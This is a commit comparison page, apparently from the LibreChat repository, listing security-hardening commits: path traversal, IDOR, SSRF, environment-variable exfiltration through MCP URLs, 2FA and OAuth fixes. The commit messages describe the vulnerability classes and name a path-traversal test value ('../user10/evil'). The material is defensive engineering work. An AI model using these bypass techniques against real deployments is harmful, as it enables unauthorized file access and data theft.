Compare commits

...

18 commits

Danny Avila
cbdc6f6060
📦 chore: Bump NPM Audit Packages (#12227)
* 🔧 chore: Update file-type dependency to version 21.3.2 in package-lock.json and package.json

- Upgraded the "file-type" package from version 18.7.0 to 21.3.2 to ensure compatibility with the latest features and security updates.
- Added new dependencies related to the updated "file-type" package, enhancing functionality and performance.

* 🔧 chore: Upgrade undici dependency to version 7.24.1 in package-lock.json and package.json

- Updated the "undici" package from version 7.18.2 to 7.24.1 across multiple package files to ensure compatibility with the latest features and security updates.

* 🔧 chore: Upgrade yauzl dependency to version 3.2.1 in package-lock.json

- Updated the "yauzl" package from version 3.2.0 to 3.2.1 to incorporate the latest features and security updates.

* 🔧 chore: Upgrade hono dependency to version 4.12.7 in package-lock.json

- Updated the "hono" package from version 4.12.5 to 4.12.7 to incorporate the latest features and security updates.
2026-03-14 03:36:03 -04:00
Danny Avila
f67bbb2bc5
🧹 fix: Sanitize Artifact Filenames in Code Execution Output (#12222)
* fix: sanitize artifact filenames to prevent path traversal in code output

* test: Mock sanitizeFilename function in process.spec.js to return the original filename

- Added a mock implementation of `sanitizeFilename` in `process.spec.js` that returns the original filename, so the tests run without the filename being altered.

* fix: use path.relative for traversal check, sanitize all filenames, add security logging

- Replace startsWith with path.relative pattern in saveLocalBuffer, consistent
  with deleteLocalFile and getLocalFileStream in the same file
- Hoist sanitizeFilename call before the image/non-image branch so both code
  paths store the sanitized name in MongoDB
- Log a warning when sanitizeFilename mutates a filename (potential traversal)
- Log a specific warning when saveLocalBuffer throws a traversal error, so
  security events are distinguishable from generic network errors in the catch

* test: improve traversal test coverage and remove mock reimplementation

- Remove partial sanitizeFilename reimplementation from process-traversal tests;
  use controlled mock returns to verify processCodeOutput wiring instead
- Add test for image branch sanitization
- Use mkdtempSync for test isolation in crud-traversal to avoid parallel worker
  collisions
- Add prefix-collision bypass test case (../user10/evil vs user1 directory)

* fix: use path.relative in isValidPath to prevent prefix-collision bypass

Pre-existing startsWith check without path separator had the same class
of prefix-collision vulnerability fixed in saveLocalBuffer.
2026-03-14 03:09:26 -04:00
Danny Avila
35a35dc2e9
📏 refactor: Add File Size Limits to Conversation Imports (#12221)
* fix: add file size limits to conversation import multer instance

* fix: address review findings for conversation import file size limits

* fix: use local jest.mock for data-schemas instead of global moduleNameMapper

The global @librechat/data-schemas mock in jest.config.js only provided
logger, breaking all tests that depend on createModels from the same
package. Replace with a virtual jest.mock scoped to the import spec file.

* fix: move import to top of file, pre-compute upload middleware, assert logger.warn in tests

* refactor: move resolveImportMaxFileSize to packages/api

New backend logic belongs in packages/api as TypeScript. Delete the
api/server/utils/import/limits.js wrapper and import directly from
@librechat/api in convos.js and importConversations.js. Resolver unit
tests move to packages/api; the api/ spec retains only multer behavior
tests.

* chore: rename importLimits to import

* fix: stale type reference and mock isolation in import tests

Update typeof import path from '../importLimits' to '../import' after
the rename. Clear mockLogger.warn in beforeEach to prevent cross-test
accumulation.

* fix: add resolveImportMaxFileSize to @librechat/api mock in convos.spec.js

* fix: resolve jest.mock hoisting issue in import tests

jest.mock factories are hoisted above const declarations, so the
mockLogger reference was undefined at factory evaluation time. Use a
direct import of the mocked logger module instead.

* fix: remove virtual flag from data-schemas mock for CI compatibility

virtual: true prevents the mock from intercepting the real module in
CI where @librechat/data-schemas is built, causing import.ts to use
the real logger while the test asserts against the mock.
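A resolver like `resolveImportMaxFileSize` might look roughly like this. The config key name and default value below are assumptions for illustration, not the project's actual values; the returned byte count would feed multer's `limits.fileSize` option:

```javascript
// Hypothetical sketch of a max-file-size resolver for conversation imports.
const DEFAULT_IMPORT_MAX_MB = 25; // assumed default, not LibreChat's real one

function resolveImportMaxFileSize(config) {
  // `fileConfig.importMaxFileSizeMB` is an illustrative key name.
  const mb = config?.fileConfig?.importMaxFileSizeMB;
  const effectiveMb = typeof mb === 'number' && mb > 0 ? mb : DEFAULT_IMPORT_MAX_MB;
  return effectiveMb * 1024 * 1024; // multer's limits.fileSize expects bytes
}
```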
2026-03-14 03:06:29 -04:00
Danny Avila
c6982dc180
🛡️ fix: Agent Permission Check on Image Upload Route (#12219)
* fix: add agent permission check to image upload route

* refactor: remove unused SystemRoles import and format test file for clarity

* fix: address review findings for image upload agent permission check

* refactor: move agent upload auth logic to TypeScript in packages/api

Extract pure authorization logic from agentPermCheck.js into
checkAgentUploadAuth() in packages/api/src/files/agentUploadAuth.ts.
The function returns a structured result ({ allowed, status, error })
instead of writing HTTP responses directly, eliminating the dual
responsibility and confusing sentinel return value. The JS wrapper
in /api is now a thin adapter that translates the result to HTTP.

* test: rewrite image upload permission tests as integration tests

Replace mock-heavy images-agent-perm.spec.js with integration tests
using MongoMemoryServer, real models, and real PermissionService.
Follows the established pattern in files.agents.test.js. Moves test
to sibling location (images.agents.test.js) matching backend convention.
Adds temp file cleanup assertions on 403/404 responses and covers
message_file exemption paths (boolean true, string "true", false).

* fix: widen AgentUploadAuthDeps types to accept ObjectId from Mongoose

The injected getAgent returns Mongoose documents where _id and author
are Types.ObjectId at runtime, not string. Widen the DI interface to
accept string | Types.ObjectId for _id, author, and resourceId so the
contract accurately reflects real callers.

* chore: move agent upload auth into files/agents/ subdirectory

* refactor: delete agentPermCheck.js wrapper, move verifyAgentUploadPermission to packages/api

The /api-only dependencies (getAgent, checkPermission) are now passed
as object-field params from the route call sites. Both images.js and
files.js import verifyAgentUploadPermission from @librechat/api and
inject the deps directly, eliminating the intermediate JS wrapper.

* style: fix import type ordering in agent upload auth

* fix: prevent token TTL race in MCPTokenStorage.storeTokens

When expires_in is provided, use it directly instead of round-tripping
through Date arithmetic. The previous code computed accessTokenExpiry
as a Date, then after an async encryptV2 call, recomputed expiresIn by
subtracting Date.now(). On loaded CI runners the elapsed time caused
Math.floor to truncate to 0, triggering the 1-year fallback and making
the token appear permanently valid — so refresh never fired.
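The TTL race can be reduced to a small sketch (shapes assumed; `elapsedMs` stands in for the time the async `encryptV2` call takes):

```javascript
const FALLBACK_EXPIRES_IN = 365 * 24 * 60 * 60; // assumed 1-year fallback

// Racy version: expires_in -> absolute Date, async work, then back to
// seconds. Elapsed time during the async step can push the recomputed
// value to 0 or below, triggering the long-lived fallback.
function resolveExpiresInRacy(expiresIn, elapsedMs) {
  const expiry = new Date(Date.now() + expiresIn * 1000);
  const nowAfterAsync = Date.now() + elapsedMs;
  const recomputed = Math.floor((expiry.getTime() - nowAfterAsync) / 1000);
  return recomputed > 0 ? recomputed : FALLBACK_EXPIRES_IN;
}

// The fix: when the provider supplies expires_in, use it directly.
function resolveExpiresInFixed(expiresIn) {
  return expiresIn;
}
```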
2026-03-14 02:57:56 -04:00
Danny Avila
71a3b48504
🔑 fix: Require OTP Verification for 2FA Re-Enrollment and Backup Code Regeneration (#12223)
* fix: require OTP verification for 2FA re-enrollment and backup code regeneration

* fix: require OTP verification for account deletion when 2FA is enabled

* refactor: Improve code formatting and readability in TwoFactorController and UserController

- Reformatted code in TwoFactorController and UserController for better readability by aligning parameters and breaking long lines.
- Updated test cases in deleteUser.spec.js and TwoFactorController.spec.js to enhance clarity by formatting object parameters consistently.

* refactor: Consolidate OTP and backup code verification logic in TwoFactorController and UserController

- Introduced a new `verifyOTPOrBackupCode` function to streamline the verification process for TOTP tokens and backup codes across multiple controllers.
- Updated the `enable2FA`, `disable2FA`, and `deleteUserController` methods to utilize the new verification function, enhancing code reusability and readability.
- Adjusted related tests to reflect the changes in verification logic, ensuring consistent behavior across different scenarios.
- Improved error handling and response messages for verification failures, providing clearer feedback to users.

* chore: linting

* refactor: Update BackupCodesItem component to enhance OTP verification logic

- Consolidated OTP input handling by moving the 2FA verification UI logic to a more consistent location within the component.
- Improved the state management for OTP readiness, ensuring the regenerate button is only enabled when the OTP is ready.
- Cleaned up imports by removing redundant type imports, enhancing code clarity and maintainability.

* chore: lint

* fix: stage 2FA re-enrollment in pending fields to prevent disarmament window

enable2FA now writes to pendingTotpSecret/pendingBackupCodes instead of
overwriting the live fields. confirm2FA performs the atomic swap only after
the new TOTP code is verified. If the user abandons mid-flow, their
existing 2FA remains active and intact.
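The staged swap can be sketched with plain objects (field names `pendingTotpSecret`/`pendingBackupCodes` come from the commit message; the surrounding controller logic is assumed):

```javascript
// enable2FA stages new secrets without touching the live fields.
function enable2FA(user, newSecret, newBackupCodes) {
  return {
    ...user,
    pendingTotpSecret: newSecret,
    pendingBackupCodes: newBackupCodes,
  };
}

// confirm2FA performs the swap only after the new TOTP code verifies;
// abandoning mid-flow leaves the existing 2FA active and intact.
function confirm2FA(user, otpValid) {
  if (!otpValid) {
    return user; // live fields untouched
  }
  const { pendingTotpSecret, pendingBackupCodes, ...rest } = user;
  return {
    ...rest,
    totpSecret: pendingTotpSecret,
    backupCodes: pendingBackupCodes,
  };
}
```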
2026-03-14 01:51:31 -04:00
Danny Avila
189cdf581d
🔐 fix: Add User Filter to Message Deletion (#12220)
* fix: add user filter to message deletion to prevent IDOR

* refactor: streamline DELETE request syntax in messages-delete test

- Combined the multi-line DELETE request in messages-delete.spec.js into a single line, improving readability without changing behavior.

* fix: address review findings for message deletion IDOR fix

* fix: add user filter to message deletion in conversation tests

- Included a user filter in the message deletion test to ensure proper handling of user-specific deletions, enhancing the accuracy of the test case and preventing potential IDOR vulnerabilities.

* chore: lint
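The essence of the IDOR fix is scoping the deletion filter to the authenticated user. A sketch with illustrative field names (the real code queries the Message model):

```javascript
// Build a MongoDB-style filter that includes the requesting user's id,
// so one user cannot delete another user's messages by guessing ids.
function buildDeleteFilter(userId, messageIds) {
  return {
    user: userId, // the fix: scope deletion to the authenticated user
    messageId: { $in: messageIds },
  };
}

// Applying it against an in-memory collection shows the scoping effect.
function deleteMessages(collection, userId, messageIds) {
  const filter = buildDeleteFilter(userId, messageIds);
  return collection.filter(
    (m) => !(m.user === filter.user && filter.messageId.$in.includes(m.messageId)),
  );
}
```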
2026-03-13 23:42:37 -04:00
Danny Avila
ca79a03135
🚦 fix: Add Rate Limiting to Conversation Duplicate Endpoint (#12218)
* fix: add rate limiting to conversation duplicate endpoint

* chore: linter

* fix: address review findings for conversation duplicate rate limiting

* refactor: streamline test mocks for conversation routes

- Consolidated mock implementations into a dedicated `convos-route-mocks.js` file to enhance maintainability and readability of test files.
- Updated tests in `convos-duplicate-ratelimit.spec.js` and `convos.spec.js` to utilize the new mock structure, improving clarity and reducing redundancy.
- Enhanced the `duplicateConversation` function to accept an optional title parameter for better flexibility in conversation duplication.

* chore: rename files
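The mechanism behind rate limiting an endpoint like this is a fixed window per key. A minimal standalone sketch (the project presumably uses middleware such as express-rate-limit; this is the idea, not its API):

```javascript
// Fixed-window, in-memory limiter keyed by e.g. user id or IP.
function createRateLimiter({ windowMs, max }) {
  const hits = new Map(); // key -> { count, windowStart }
  return function isAllowed(key, now = Date.now()) {
    const entry = hits.get(key);
    if (!entry || now - entry.windowStart >= windowMs) {
      hits.set(key, { count: 1, windowStart: now }); // new window
      return true;
    }
    entry.count += 1;
    return entry.count <= max;
  };
}
```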
2026-03-13 23:40:44 -04:00
Danny Avila
fa9e1b228a
🪪 fix: MCP API Responses and OAuth Validation (#12217)
* 🔒 fix: Validate MCP Configs in Server Responses

* 🔒 fix: Enhance OAuth URL Validation in MCPOAuthHandler

- Introduced validation for OAuth URLs to ensure they do not target private or internal addresses, enhancing security against SSRF attacks.
- Updated the OAuth flow to validate both authorization and token URLs before use, ensuring compliance with security standards.
- Refactored redirect URI handling to streamline the OAuth client registration process.
- Added comprehensive error handling for invalid URLs, improving robustness in OAuth interactions.

* 🔒 feat: Implement Permission Checks for MCP Server Management

- Added permission checkers for MCP server usage and creation, enhancing access control.
- Updated routes for reinitializing MCP servers and retrieving authentication values to include these permission checks, ensuring only authorized users can access these functionalities.
- Refactored existing permission logic to improve clarity and maintainability.

* 🔒 fix: Enhance MCP Server Response Validation and Redaction

- Updated MCP route tests to use `toMatchObject` for better validation of server response structures, ensuring consistency in expected properties.
- Refactored the `redactServerSecrets` function to streamline the removal of sensitive information, ensuring that user-sourced API keys are properly redacted while retaining their source.
- Improved OAuth security tests to validate rejection of private URLs across multiple endpoints, enhancing protection against SSRF vulnerabilities.
- Added comprehensive tests for the `redactServerSecrets` function to ensure proper handling of various server configurations, reinforcing security measures.

* chore: eslint

* 🔒 fix: Enhance OAuth Server URL Validation in MCPOAuthHandler

- Added validation for discovered authorization server URLs to ensure they meet security standards.
- Improved logging to provide clearer insights when an authorization server is found from resource metadata.
- Refactored the handling of authorization server URLs to enhance robustness against potential security vulnerabilities.

* 🔒 test: Bypass SSRF validation for MCP OAuth Flow tests

- Mocked SSRF validation functions to allow tests to use real local HTTP servers, facilitating more accurate testing of the MCP OAuth flow.
- Updated test setup to ensure compatibility with the new mocking strategy, enhancing the reliability of the tests.

* 🔒 fix: Add Validation for OAuth Metadata Endpoints in MCPOAuthHandler

- Implemented checks for the presence and validity of registration and token endpoints in the OAuth metadata, enhancing security by ensuring that these URLs are properly validated before use.
- Improved error handling and logging to provide better insights during the OAuth metadata processing, reinforcing the robustness of the OAuth flow.

* 🔒 refactor: Simplify MCP Auth Values Endpoint Logic

- Removed redundant permission checks for accessing the MCP server resource in the auth-values endpoint, streamlining the request handling process.
- Consolidated error handling and response structure for improved clarity and maintainability.
- Enhanced logging for better insights during the authentication value checks, reinforcing the robustness of the endpoint.

* 🔒 test: Refactor LeaderElection Integration Tests for Improved Cleanup

- Moved Redis key cleanup to the beforeEach hook to ensure a clean state before each test.
- Enhanced afterEach logic to handle instance resignations and Redis key deletion more robustly, improving test reliability and maintainability.
2026-03-13 23:18:56 -04:00
Danny Avila
f32907cd36
🔏 fix: MCP Server URL Schema Validation (#12204)
* fix: MCP server configuration validation and schema

- Added tests to reject URLs containing environment variable references for SSE, streamable-http, and websocket types in the MCP routes.
- Introduced a new schema in the data provider to ensure user input URLs do not resolve environment variables, enhancing security against potential leaks.
- Updated existing MCP server user input schema to utilize the new validation logic, ensuring consistent handling of user-supplied URLs across the application.

* fix: MCP URL validation to reject env variable references

- Updated tests to ensure that URLs for SSE, streamable-http, and websocket types containing environment variable patterns are rejected, improving security against potential leaks.
- Refactored the MCP server user input schema to enforce stricter validation rules, preventing the resolution of environment variables in user-supplied URLs.
- Introduced new test cases for various URL types to validate the rejection logic, ensuring consistent handling across the application.

* test: Enhance MCPServerUserInputSchema tests for environment variable handling

- Introduced new test cases to validate the prevention of environment variable exfiltration through user input URLs in the MCPServerUserInputSchema.
- Updated existing tests to confirm that URLs containing environment variable patterns are correctly resolved or rejected, improving security against potential leaks.
- Refactored test structure to better organize environment variable handling scenarios, ensuring comprehensive coverage of edge cases.
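A minimal sketch of rejecting environment-variable references in user-supplied URLs, assuming `${VAR_NAME}` placeholders like those resolved in server-managed configs (the real check lives in a zod schema in the data provider):

```javascript
// Reject any URL containing a ${...} placeholder before it can be
// resolved against server environment variables.
const ENV_VAR_PATTERN = /\$\{[^}]*\}/;

function isAcceptableUserUrl(urlString) {
  if (ENV_VAR_PATTERN.test(urlString)) {
    return false; // would exfiltrate a resolved env value
  }
  try {
    new URL(urlString); // must still be a parseable URL
    return true;
  } catch {
    return false;
  }
}
```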
2026-03-12 23:19:31 -04:00
github-actions[bot]
65b0bfde1b
🌍 i18n: Update translation.json with latest translations (#12203)
Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
2026-03-12 20:48:05 -04:00
Danny Avila
3ddf62c8e5
🫙 fix: Force MeiliSearch Full Sync on Empty Index State (#12202)
* fix: meili index sync with unindexed documents

- Updated `performSync` function to force a full sync when a fresh MeiliSearch index is detected, even if the number of unindexed messages or convos is below the sync threshold.
- Added logging to indicate when a fresh index is detected and a full sync is initiated.
- Introduced new tests to validate the behavior of the sync logic under various conditions, ensuring proper handling of fresh indexes and threshold scenarios.

This change improves the reliability of the synchronization process, ensuring that all documents are indexed correctly when starting with a fresh index.

* refactor: update sync logic for unindexed documents in MeiliSearch

- Renamed variables in `performSync` to improve clarity, changing `freshIndex` to `noneIndexed` for better understanding of the sync condition.
- Adjusted the logic to ensure a full sync is forced when no messages or conversations are marked as indexed, even if below the sync threshold.
- Updated related tests to reflect the new logging messages and conditions, enhancing the accuracy of the sync threshold logic.

This change improves the readability and reliability of the synchronization process, ensuring all documents are indexed correctly when starting with a fresh index.

* fix: enhance MeiliSearch index creation error handling

- Updated the `mongoMeili` function to improve logging and error handling during index creation in MeiliSearch.
- Added handling for `MeiliSearchTimeOutError` to log a warning when index creation times out.
- Enhanced logging to differentiate between successful index creation and specific failure reasons, including cases where the index already exists.
- Improved debug logging for index creation tasks to provide clearer insights into the process.

This change enhances the robustness of the index creation process and improves observability for troubleshooting.

* fix: update MeiliSearch index creation error handling

- Modified the `mongoMeili` function to check for any status other than 'succeeded' during index creation, enhancing error detection.
- Improved logging to provide clearer insights when an index creation task fails, particularly for cases where the index already exists.

This change strengthens the error handling mechanism for index creation in MeiliSearch, ensuring better observability and reliability.
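The sync decision described above reduces to a small predicate. Names follow the commit's `noneIndexed` rename; the parameter shapes and threshold semantics are assumptions:

```javascript
// Force a full sync on a fresh/empty index even below the threshold;
// otherwise fall back to the usual unindexed-count comparison.
function shouldFullSync({ unindexedCount, totalCount, noneIndexed, syncThreshold }) {
  if (noneIndexed && totalCount > 0) {
    return true; // documents exist but none are indexed: fresh index
  }
  return unindexedCount >= syncThreshold;
}
```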
2026-03-12 20:43:23 -04:00
github-actions[bot]
fc6f7a337d
🌍 i18n: Update translation.json with latest translations (#12176)
Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
2026-03-11 11:46:55 -04:00
Danny Avila
9a5d7eaa4e
refactor: Replace tiktoken with ai-tokenizer (#12175)
* chore: Update dependencies by adding ai-tokenizer and removing tiktoken

- Added ai-tokenizer version 1.0.6 to package.json and package-lock.json across multiple packages.
- Removed tiktoken version 1.0.15 from package.json and package-lock.json in the same locations, streamlining dependency management.

* refactor: replace js-tiktoken with ai-tokenizer

- Added support for 'claude' encoding in the AgentClient class to improve model compatibility.
- Updated Tokenizer class to utilize 'ai-tokenizer' for both 'o200k_base' and 'claude' encodings, replacing the previous 'tiktoken' dependency.
- Refactored tests to reflect changes in tokenizer behavior and ensure accurate token counting for both encoding types.
- Removed deprecated references to 'tiktoken' and adjusted related tests for improved clarity and functionality.

* chore: remove tiktoken mocks from DALLE3 tests

- Eliminated mock implementations of 'tiktoken' from DALLE3-related test files to streamline test setup and align with recent dependency updates.
- Adjusted related test structures to ensure compatibility with the new tokenizer implementation.

* chore: Add distinct encoding support for Anthropic Claude models

- Introduced a new method `getEncoding` in the AgentClient class to handle the specific BPE tokenizer for Claude models, ensuring compatibility with the distinct encoding requirements.
- Updated documentation to clarify the encoding logic for Claude and other models.

* docs: Update return type documentation for getEncoding method in AgentClient

- Clarified the return type of the getEncoding method to specify that it can return an EncodingName or undefined, enhancing code readability and type safety.

* refactor: Tokenizer class and error handling

- Exported the EncodingName type for broader usage.
- Renamed encodingMap to encodingData for clarity.
- Improved error handling in getTokenCount method to ensure recovery attempts are logged and return 0 on failure.
- Updated countTokens function documentation to specify the use of 'o200k_base' encoding.

* refactor: Simplify encoding documentation and export type

- Updated the getEncoding method documentation to clarify the default behavior for non-Anthropic Claude models.
- Exported the EncodingName type separately from the Tokenizer module for improved clarity and usage.

* test: Update text processing tests for token limits

- Adjusted test cases to handle smaller text sizes, changing scenarios from ~120k tokens to ~20k tokens for both the real tokenizer and countTokens functions.
- Updated token limits in tests to reflect new constraints, ensuring tests accurately assess performance and call reduction.
- Enhanced console log messages for clarity regarding token counts and reductions in the updated scenarios.

* refactor: Update Tokenizer imports and exports

- Moved Tokenizer and countTokens exports to the tokenizer module for better organization.
- Adjusted imports in memory.ts to reflect the new structure, ensuring consistent usage across the codebase.
- Updated memory.test.ts to mock the Tokenizer from the correct module path, enhancing test accuracy.

* refactor: Tokenizer initialization and error handling

- Introduced an async `initEncoding` method to preload tokenizers, improving performance and accuracy in token counting.
- Updated `getTokenCount` to handle uninitialized tokenizers more gracefully, ensuring proper recovery and logging on errors.
- Removed deprecated synchronous tokenizer retrieval, streamlining the overall tokenizer management process.

* test: Enhance tokenizer tests with initialization and encoding checks

- Added `beforeAll` hooks to initialize tokenizers for 'o200k_base' and 'claude' encodings before running tests, ensuring proper setup.
- Updated tests to validate the loading of encodings and the correctness of token counts for both 'o200k_base' and 'claude'.
- Improved test structure to deduplicate concurrent initialization calls, enhancing performance and reliability.
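The encoding selection described for `getEncoding` can be sketched as a model-name heuristic (the real method lives on AgentClient; the matching rule here is an assumption):

```javascript
// Anthropic Claude models use a distinct BPE tokenizer; everything else
// falls back to the o200k_base encoding.
function getEncoding(modelName) {
  if (typeof modelName === 'string' && modelName.toLowerCase().includes('claude')) {
    return 'claude';
  }
  return 'o200k_base';
}
```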
2026-03-10 23:14:52 -04:00
Danny Avila
fcb344da47
🛂 fix: MCP OAuth Race Conditions, CSRF Fallback, and Token Expiry Handling (#12171)
* fix: Handle race conditions in MCP OAuth flow

- Added connection mutex to coalesce concurrent `getUserConnection` calls, preventing multiple simultaneous attempts.
- Enhanced flow state management to retry once when a flow state is missing, improving resilience against race conditions.
- Introduced `ReauthenticationRequiredError` for better error handling when access tokens are expired or missing.
- Updated tests to cover new race condition scenarios and ensure proper handling of OAuth flows.

* fix: Stale PENDING flow detection and OAuth URL re-issuance

PENDING flows in handleOAuthRequired now check createdAt age — flows
older than 2 minutes are treated as stale and replaced instead of
joined. Fixes the case where a leftover PENDING flow from a previous
session blocks new OAuth initiation.

authorizationUrl is now stored in MCPOAuthFlowMetadata so that when a
second caller joins an active PENDING flow (e.g., the SSE-emitting path
in ToolService), it can re-issue the URL to the user via oauthStart.

* fix: CSRF fallback via active PENDING flow in OAuth callback

When the OAuth callback arrives without CSRF or session cookies (common
in the chat/SSE flow where cookies can't be set on streaming responses),
fall back to validating that a PENDING flow exists for the flowId. This
is safe because the flow was created server-side after JWT authentication
and the authorization code is PKCE-protected.

* test: Extract shared OAuth test server helpers

Move MockKeyv, getFreePort, trackSockets, and createOAuthMCPServer into
a shared helpers/oauthTestServer module. Enhance the test server with
refresh token support, token rotation, metadata discovery, and dynamic
client registration endpoints. Add InMemoryTokenStore for token storage
tests.

Refactor MCPOAuthRaceCondition.test.ts to import from shared helpers.

* test: Add comprehensive MCP OAuth test modules

MCPOAuthTokenStorage — 21 tests for storeTokens/getTokens with
InMemoryTokenStore: encrypt/decrypt round-trips, expiry calculation,
refresh callback wiring, ReauthenticationRequiredError paths.

MCPOAuthFlow — 10 tests against real HTTP server: token refresh with
stored client info, refresh token rotation, metadata discovery, dynamic
client registration, full store/retrieve/expire/refresh lifecycle.

MCPOAuthConnectionEvents — 5 tests for MCPConnection OAuth event cycle
with real OAuth-gated MCP server: oauthRequired emission on 401,
oauthHandled reconnection, oauthFailed rejection, token expiry detection.

MCPOAuthTokenExpiry — 12 tests for the token expiry edge case: refresh
success/failure paths, ReauthenticationRequiredError, PENDING flow CSRF
fallback, authorizationUrl metadata storage, full re-auth cycle after
refresh failure, concurrent expired token coalescing, stale PENDING
flow detection.

* test: Enhance MCP OAuth connection tests with cooldown reset

Added a `beforeEach` hook to clear the cooldown for `MCPConnection` before each test, ensuring a clean state. Updated the race condition handling in the tests to properly clear the timeout, improving reliability in the event data retrieval process.

* refactor: PENDING flow management and state recovery in MCP OAuth

- Introduced a constant `PENDING_STALE_MS` to define the age threshold for PENDING flows, improving the handling of stale flows.
- Updated the logic in `MCPConnectionFactory` and `FlowStateManager` to check the age of PENDING flows before joining or reusing them.
- Modified the `completeFlow` method to return false when the flow state is deleted, ensuring graceful handling of race conditions.
- Enhanced tests to validate the new behavior and ensure robustness against state recovery issues.

* refactor: MCP OAuth flow management and testing

- Updated the `completeFlow` method to log warnings when a tool flow state is not found during completion, improving error handling.
- Introduced a new `normalizeExpiresAt` function to standardize expiration timestamp handling across the application.
- Refactored token expiration checks in `MCPConnectionFactory` to utilize the new normalization function, ensuring consistent behavior.
- Added a comprehensive test suite for OAuth callback CSRF fallback logic, validating the handling of PENDING flows and their staleness.
- Enhanced existing tests to cover new expiration normalization logic and ensure robust flow state management.

* test: Add CSRF fallback tests for active PENDING flows in MCP OAuth

- Introduced new tests to validate CSRF fallback behavior when a fresh PENDING flow exists without cookies, ensuring successful OAuth callback handling.
- Added scenarios to reject requests when no PENDING flow exists, when only a COMPLETED flow is present, and when a PENDING flow is stale, enhancing the robustness of flow state management.
- Improved overall test coverage for OAuth callback logic, reinforcing the handling of CSRF validation failures.

* chore: imports order

* refactor: Update UserConnectionManager to conditionally manage pending connections

- Modified the logic in `UserConnectionManager` to only set pending connections if `forceNew` is false, preventing unnecessary overwrites.
- Adjusted the cleanup process to ensure pending connections are only deleted when not forced, enhancing connection management efficiency.

* refactor: MCP OAuth flow state management

- Introduced a new method `storeStateMapping` in `MCPOAuthHandler` to securely map the OAuth state parameter to the flow ID, improving callback resolution and security against forgery.
- Updated the OAuth initiation and callback handling in `mcp.js` to utilize the new state mapping functionality, ensuring robust flow management.
- Refactored `MCPConnectionFactory` to store state mappings during flow initialization, enhancing the integrity of the OAuth process.
- Adjusted comments to clarify the purpose of state parameters in authorization URLs, reinforcing code readability.

* refactor: MCPConnection with OAuth recovery handling

- Added `oauthRecovery` flag to manage OAuth recovery state during connection attempts.
- Introduced `decrementCycleCount` method to reduce the circuit breaker's cycle count upon successful reconnection after OAuth recovery.
- Updated connection logic to reset the `oauthRecovery` flag after handling OAuth, improving state management and connection reliability.

* chore: Add debug logging for OAuth recovery cycle count decrement

- Introduced a debug log statement in the `MCPConnection` class to track the decrement of the cycle count after a successful reconnection during OAuth recovery.
- This enhancement improves observability and aids in troubleshooting connection issues related to OAuth recovery.

* test: Add OAuth recovery cycle management tests

- Introduced new tests for the OAuth recovery cycle in `MCPConnection`, validating the decrement of cycle counts after successful reconnections.
- Added scenarios to ensure that the cycle count is not decremented on OAuth failures, enhancing the robustness of connection management.
- Improved test coverage for OAuth reconnect scenarios, ensuring reliable behavior under various conditions.

* feat: Implement circuit breaker configuration in MCP

- Added circuit breaker settings to `.env.example` for max cycles, cycle window, and cooldown duration.
- Refactored `MCPConnection` to utilize the new configuration values from `mcpConfig`, enhancing circuit breaker management.
- Improved code maintainability by centralizing circuit breaker parameters in the configuration file.

* refactor: Update decrementCycleCount method for circuit breaker management

- Changed the visibility of the `decrementCycleCount` method in `MCPConnection` from private to public static, allowing it to be called with a server name parameter.
- Updated calls to `decrementCycleCount` in `MCPConnectionFactory` to use the new static method, improving clarity and consistency in circuit breaker management during connection failures and OAuth recovery.
- Enhanced the handling of circuit breaker state by ensuring the method checks for the existence of the circuit breaker before decrementing the cycle count.
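The shape of a public static decrement hook can be sketched as follows. The method name mirrors the commit message, but the per-server registry and its internals are assumed for illustration:

```javascript
// Rough sketch of a per-server circuit breaker with a static decrement hook.
class MCPConnection {
  static breakers = new Map(); // serverName → { cycleCount }

  static recordCycle(serverName) {
    const breaker = MCPConnection.breakers.get(serverName) ?? { cycleCount: 0 };
    breaker.cycleCount += 1;
    MCPConnection.breakers.set(serverName, breaker);
  }

  // Public and static so a factory can "refund" a cycle after a successful
  // reconnection (e.g. post-OAuth recovery) without holding an instance.
  // Checks the breaker exists before decrementing, and never goes below zero.
  static decrementCycleCount(serverName) {
    const breaker = MCPConnection.breakers.get(serverName);
    if (breaker && breaker.cycleCount > 0) {
      breaker.cycleCount -= 1;
    }
  }
}

MCPConnection.recordCycle('example-server');
MCPConnection.recordCycle('example-server');
MCPConnection.decrementCycleCount('example-server');
console.log(MCPConnection.breakers.get('example-server').cycleCount); // 1
```

Making the refund static is what lets `MCPConnectionFactory` credit a recovery back even when the failing connection instance has already been torn down.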

* refactor: cycle count decrement on tool listing failure

- Added a call to `MCPConnection.decrementCycleCount` in the `MCPConnectionFactory` to handle cases where unauthenticated tool listing fails, improving circuit breaker management.
- This change ensures that the cycle count is decremented appropriately, maintaining the integrity of the connection recovery process.

* refactor: Update circuit breaker configuration and logic

- Enhanced circuit breaker settings in `.env.example` to include new parameters for failed rounds and backoff strategies.
- Refactored `MCPConnection` to utilize the updated configuration values from `mcpConfig`, improving circuit breaker management.
- Updated tests to reflect changes in circuit breaker logic, ensuring accurate validation of connection behavior under rapid reconnect scenarios.

* feat: Implement state mapping deletion in MCP flow management

- Added a new method `deleteStateMapping` in `MCPOAuthHandler` to remove orphaned state mappings when a flow is replaced, preventing old authorization URLs from resolving after a flow restart.
- Updated `MCPConnectionFactory` to call `deleteStateMapping` during flow cleanup, ensuring proper management of OAuth states.
- Enhanced test coverage for state mapping functionality to validate the new deletion logic.
2026-03-10 21:15:01 -04:00
Danny Avila
6167ce6e57
🧪 chore: MCP Reconnect Storm Follow-Up Fixes and Integration Tests (#12172)
* 🧪 test: Add reconnection storm regression tests for MCPConnection

Introduced a comprehensive test suite for reconnection storm scenarios, validating circuit breaker, throttling, cooldown, and timeout fixes. The tests utilize real MCP SDK transports and a StreamableHTTP server to ensure accurate behavior under rapid connect/disconnect cycles and error handling for SSE 400/405 responses. This enhances the reliability of the MCPConnection by ensuring proper handling of reconnection logic and circuit breaker functionality.

* 🔧 fix: Update createUnavailableToolStub to return structured response

Modified the `createUnavailableToolStub` function to return an array containing the unavailable message and a null value, enhancing the response structure. Additionally, added a debug log to skip tool creation when the result is null, improving the handling of reconnection scenarios in the MCP service.

* 🧪 test: Enhance MCP tool creation tests for cache and throttle interactions

Added new test cases for the `createMCPTool` function to validate the caching behavior when tools are unavailable or throttled. The tests ensure that tools are correctly cached as missing and prevent unnecessary reconnects across different users, improving the reliability of the MCP service under concurrent usage scenarios. Additionally, introduced a test for the `createMCPTools` function to verify that it returns an empty array when reconnect is throttled, ensuring proper handling of throttling logic.

